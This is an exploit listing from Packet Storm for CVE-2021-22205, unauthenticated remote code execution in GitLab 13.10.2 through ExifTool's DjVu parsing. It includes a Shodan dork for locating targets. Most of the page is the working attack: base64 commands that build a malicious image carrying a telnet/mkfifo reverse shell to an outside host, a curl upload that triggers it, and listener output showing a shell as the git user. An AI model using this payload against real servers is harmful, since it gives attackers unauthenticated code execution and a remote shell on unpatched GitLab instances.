GitLab 13.10.2 Remote Code Execution

🗓️ 17 Nov 2021 00:00:00Reported by Jacob BainesType

packetstorm🔗 packetstormsecurity.com👁 852 Views

GitLab 13.10.2 Remote Code Execution (RCE

Reporter	Title	Published	Views	Family All 168
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	3 May 202216:36	–	githubexploit
GithubExploit	Exploit for Code Injection in Gitlab	5 Jun 202115:42	–	githubexploit
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	2 Aug 202109:11	–	githubexploit
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	27 Oct 202515:59	–	githubexploit
GithubExploit	Exploit for Code Injection in Gitlab	30 Oct 202111:54	–	githubexploit
GithubExploit	Exploit for Code Injection in Gitlab	29 Oct 202104:15	–	githubexploit
GithubExploit	Exploit for Code Injection in Gitlab	9 Nov 202118:19	–	githubexploit
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	29 Dec 202113:41	–	githubexploit
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	14 May 202303:43	–	githubexploit
GithubExploit	Exploit for Code Injection in Exiftool_Project Exiftool	4 Nov 202114:31	–	githubexploit

`# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)  
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22  
# Date: 11/01/2021  
# Exploit Author: Jacob Baines  
# Vendor Homepage: https://about.gitlab.com/  
# Software Link: https://gitlab.com/gitlab-org/gitlab  
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8  
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)  
# CVE : CVE-2021-22205  
# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/  
# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed  
  
Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.  
  
1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.  
  
echo -e  
"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="  
| base64 -d > lol.jpg  
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg  
echo -n  
"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="  
| base64 -d >> lol.jpg  
  
2. Sending the payload. Any random endpoint will do.  
  
curl -v -F '[email protected]' http://10.0.0.7/$(openssl rand -hex 8)  
  
2a. Sample Output from the reverse shell:  
  
$ nc -lnvp 1270  
Listening on [0.0.0.0] (family 0, port 1270)  
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport  
34836)  
whoami  
git  
id  
uid=998(git) gid=998(git) groups=998(git)  
`

17 Nov 2021 00:00Current

9High risk

Vulners AI Score9

CVSS 27.5

CVSS 3.110

EPSS0.94467